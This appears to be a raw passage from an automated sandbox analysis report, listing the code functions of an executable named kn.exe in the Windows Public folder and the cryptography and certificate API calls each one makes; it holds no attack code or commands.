                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A96CE0 NCryptEnumStorageProviders,#360,6_2_00007FF6A2A96CE0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A24CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,6_2_00007FF6A2A24CC0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A96D2C NCryptFreeBuffer,#360,6_2_00007FF6A2A96D2C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A22D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF6A2A22D18
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A60D14 NCryptFinalizeKey,#205,#357,#357,6_2_00007FF6A2A60D14
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A62CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,6_2_00007FF6A2A62CFC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A52CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,6_2_00007FF6A2A52CF8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A98C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,6_2_00007FF6A2A98C58
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A60C3C NCryptExportKey,#205,#359,#359,#357,6_2_00007FF6A2A60C3C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29C6C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,6_2_00007FF6A29C6C4C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A6ACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,6_2_00007FF6A2A6ACAC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A54CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,6_2_00007FF6A2A54CA0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A96C88 NCryptEnumAlgorithms,#360,6_2_00007FF6A2A96C88
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA4C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,6_2_00007FF6A2AA4C80
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A62C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,6_2_00007FF6A2A62C80
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A9A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF6A2A9A9F0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A2E9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,6_2_00007FF6A2A2E9F0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A44A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,6_2_00007FF6A2A44A34
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A64A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,6_2_00007FF6A2A64A1C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A60A18 BCryptSetProperty,#205,#359,#357,#357,6_2_00007FF6A2A60A18
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4AA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,6_2_00007FF6A2A4AA00
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29EC960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF6A29EC960
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A68940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,6_2_00007FF6A2A68940
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A6C940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,6_2_00007FF6A2A6C940
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A6099C BCryptOpenAlgorithmProvider,#205,#359,#359,6_2_00007FF6A2A6099C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A229A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,6_2_00007FF6A2A229A0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A92994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,6_2_00007FF6A2A92994
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A62AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,6_2_00007FF6A2A62AE4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A60ABC BCryptVerifySignature,#205,#357,#357,#357,#357,6_2_00007FF6A2A60ABC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A02B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,6_2_00007FF6A2A02B00
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A58AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,6_2_00007FF6A2A58AFC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A68AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6A2A68AA0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29D6A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,6_2_00007FF6A29D6A84
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,6_2_00007FF6A2A4EA7C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A92A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,6_2_00007FF6A2A92A78
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A59028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,6_2_00007FF6A2A59028
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29D7034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,6_2_00007FF6A29D7034
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A6301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6A2A6301C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29D302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,6_2_00007FF6A29D302F
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A67020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6A2A67020
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A9700C BCryptEnumAlgorithms,#360,6_2_00007FF6A2A9700C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8EF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,6_2_00007FF6A2A8EF74
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A50F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,6_2_00007FF6A2A50F58
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A44F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF6A2A44F50
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A60FB4 NCryptOpenKey,#205,#359,#357,#357,6_2_00007FF6A2A60FB4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A96FAC BCryptOpenAlgorithmProvider,#360,6_2_00007FF6A2A96FAC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F4F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,6_2_00007FF6A29F4F90
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A610D8 NCryptSetProperty,#205,#359,#357,#359,#357,6_2_00007FF6A2A610D8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A630D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF6A2A630D8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A970C8 BCryptSetProperty,#360,6_2_00007FF6A2A970C8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A19134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,6_2_00007FF6A2A19134
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,6_2_00007FF6A2A8511C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A97124 BCryptGenerateKeyPair,#360,6_2_00007FF6A2A97124
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A61058 NCryptOpenStorageProvider,#205,#359,#357,6_2_00007FF6A2A61058
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A9705C BCryptGetProperty,#360,6_2_00007FF6A2A9705C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A2B098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,6_2_00007FF6A2A2B098
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A6B0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6A2A6B0A0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A0107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,6_2_00007FF6A2A0107C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A96DE0 NCryptCreatePersistedKey,#360,6_2_00007FF6A2A96DE0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A44DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF6A2A44DDC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A88DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,6_2_00007FF6A2A88DD0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A60DD4 NCryptGetProperty,#205,#359,#357,#359,#357,6_2_00007FF6A2A60DD4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AB0DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,6_2_00007FF6A2AB0DB8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F0E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6A29F0E24
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A92DAC #357,#357,CryptFindOIDInfo,LocalFree,6_2_00007FF6A2A92DAC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A62D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF6A2A62D78
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A96D78 NCryptOpenKey,#360,6_2_00007FF6A2A96D78
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A60D84 NCryptFreeObject,#205,#357,6_2_00007FF6A2A60D84
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A60EF4 NCryptImportKey,#205,#359,#359,#357,6_2_00007FF6A2A60EF4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AC0ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,6_2_00007FF6A2AC0ED0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F8F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,6_2_00007FF6A29F8F1C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A96F2C NCryptExportKey,#360,6_2_00007FF6A2A96F2C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A62E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,6_2_00007FF6A2A62E6C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA4E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,6_2_00007FF6A2AA4E58
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A96E48 NCryptSetProperty,#360,6_2_00007FF6A2A96E48
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A96EA8 NCryptImportKey,#360,6_2_00007FF6A2A96EA8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8EE94 CryptSignMessage,SetLastError,6_2_00007FF6A2A8EE94
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A00E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,6_2_00007FF6A2A00E94
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A32E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF6A2A32E7C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A453E8 CryptEncodeObjectEx,GetLastError,#357,6_2_00007FF6A2A453E8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A213F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,6_2_00007FF6A2A213F0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,6_2_00007FF6A2A4B3D8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A6342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6A2A6342C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A9141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF6A2A9141C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29EB36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,6_2_00007FF6A29EB36C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F7340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,6_2_00007FF6A29F7340
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A1B350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,6_2_00007FF6A2A1B350
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A25338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF6A2A25338
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A733B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,6_2_00007FF6A2A733B0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A993A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_00007FF6A2A993A0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A433A0 CryptVerifyCertificateSignature,CertCompareCertificateName,6_2_00007FF6A2A433A0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A9739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,6_2_00007FF6A2A9739C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A63390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF6A2A63390
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A7B4EC CryptDecodeObjectEx,SetLastError,6_2_00007FF6A2A7B4EC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A914F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,6_2_00007FF6A2A914F0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A634F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF6A2A634F8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A23504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,6_2_00007FF6A2A23504
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A7B464 CryptEncodeObjectEx,SetLastError,6_2_00007FF6A2A7B464
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29C5438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,6_2_00007FF6A29C5438
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8F4A0 CryptHashPublicKeyInfo,SetLastError,6_2_00007FF6A2A8F4A0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4F488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,6_2_00007FF6A2A4F488
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A69480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6A2A69480
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A611C8 NCryptVerifySignature,#205,#357,#357,#357,#357,6_2_00007FF6A2A611C8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A971C8 BCryptDestroyKey,#360,6_2_00007FF6A2A971C8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A631C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF6A2A631C0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A97214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,6_2_00007FF6A2A97214
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AB9208 #357,NCryptEnumKeys,#360,#358,6_2_00007FF6A2AB9208
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4F168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,6_2_00007FF6A2A4F168
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A45164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF6A2A45164
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A351A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,6_2_00007FF6A2A351A4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A43188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,6_2_00007FF6A2A43188
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A97178 BCryptCloseAlgorithmProvider,#360,6_2_00007FF6A2A97178
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A5F2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6A2A5F2F0
